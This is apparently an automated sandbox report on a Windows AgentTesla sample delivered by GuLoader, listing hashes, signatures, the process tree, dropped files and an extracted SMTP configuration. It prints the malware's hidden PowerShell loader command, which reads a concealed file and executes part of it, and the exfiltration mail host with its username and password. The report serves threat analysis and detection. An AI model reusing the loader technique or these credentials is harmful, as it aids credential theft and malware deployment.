Analysis
-
max time kernel
142s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
28-03-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Grnskollingernes237/pladsholderknudes.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Grnskollingernes237/pladsholderknudes.ps1
Resource
win10v2004-20240226-en
General
-
Target
857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe
-
Size
510KB
-
MD5
2337534b5deaa7c40784d61ad8602b08
-
SHA1
c74b04ac76a83ad77a8c570fe670ccc9a5b7dfdb
-
SHA256
857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305
-
SHA512
63bccd72dd7a5f83721b65c6219254748977887b7c1920d7aa49e10f5510aa9098beae2bda9b2f9439b1fb8da41a00f9c7d33fef21c53b34fc4adb914d113951
-
SSDEEP
12288:DlbPIiKP9/FOTzcxJkXwCbnIuX4cRljTJTSUXht/rDTo:5PIRDUgIbbIuocDTo
Malware Config
Extracted
Protocol: smtp- Host:
shark.ipchina163.com - Port:
587 - Username:
[email protected] - Password:
=klKQ6APEoJ7
Extracted
agenttesla
Protocol: smtp- Host:
shark.ipchina163.com - Port:
587 - Username:
[email protected] - Password:
=klKQ6APEoJ7 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org 18 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2868 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1648 powershell.exe 2868 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1648 set thread context of 2868 1648 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exewab.exepid process 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 2868 wab.exe 2868 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 2868 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 2868 wab.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exepowershell.exedescription pid process target process PID 1688 wrote to memory of 1648 1688 857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe powershell.exe PID 1688 wrote to memory of 1648 1688 857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe powershell.exe PID 1688 wrote to memory of 1648 1688 857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe powershell.exe PID 1688 wrote to memory of 1648 1688 857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe powershell.exe PID 1648 wrote to memory of 2512 1648 powershell.exe cmd.exe PID 1648 wrote to memory of 2512 1648 powershell.exe cmd.exe PID 1648 wrote to memory of 2512 1648 powershell.exe cmd.exe PID 1648 wrote to memory of 2512 1648 powershell.exe cmd.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe PID 1648 wrote to memory of 2868 1648 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe"C:\Users\Admin\AppData\Local\Temp\857cabdf843986bade93bb6882b28bd696727e57333880dabd1666745ae27305.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Flyvesikringstjenesterne=Get-Content 'C:\Users\Admin\AppData\Roaming\Skrigeriernes172\numda\frimenighedsprsterne\Grnskollingernes237\pladsholderknudes.Fyr';$Kanalernes=$Flyvesikringstjenesterne.SubString(8868,3);.$Kanalernes($Flyvesikringstjenesterne)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2512
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2868
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5b538d9fc83ecd623f08d40662570a01d
SHA1f0883f5df4603d04cd62a80362ebe995c132dcff
SHA2566476fdea0b41173f28f22149dc2c34614a192fdee801b934e5d70c9fd2a1130f
SHA512151ea8bc1c184c7692bbb5745d0e441beeeb7af9b59259345e02a1f5aa0756615df2083991f942e9717f785363bf97a5af1a5d917a802b17298b57b050de17ef
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
307KB
MD5b04a668cfe1dfac5df4861136834b7d2
SHA19c98aebada10a79079caf025471a000f1940dd57
SHA2567beca2ce0dda69160b4d94b3f0bddd3645b016c143322c9efd749075dcff65f7
SHA512d8cfa468cedbbaffbe853f2841100d6536b0675d8ea5af186332c8d40992bab0e7237aa9eff2e11f85e1985d2804ad937f4224389cb2f85351e7fb9901ba1b41
-
C:\Users\Admin\AppData\Roaming\Skrigeriernes172\numda\frimenighedsprsterne\Grnskollingernes237\pladsholderknudes.Fyr
Filesize58KB
MD5b727db78e2c5f3b1559e11ceef7af2fb
SHA1622ee25305320a7c6c2f7e6b201d9c1204d00053
SHA25607a3c1a8c29ae7eb5b17b815e3c470068313f9911bf890f58f68f43cb42f2d54
SHA51219116eb53099a09bc314577f4954870ead121ee2c7818d0653973d30597abc7c9b698407583893b7171b40861aa279e5c619fbd640db9075ad4aa91fb2e62f36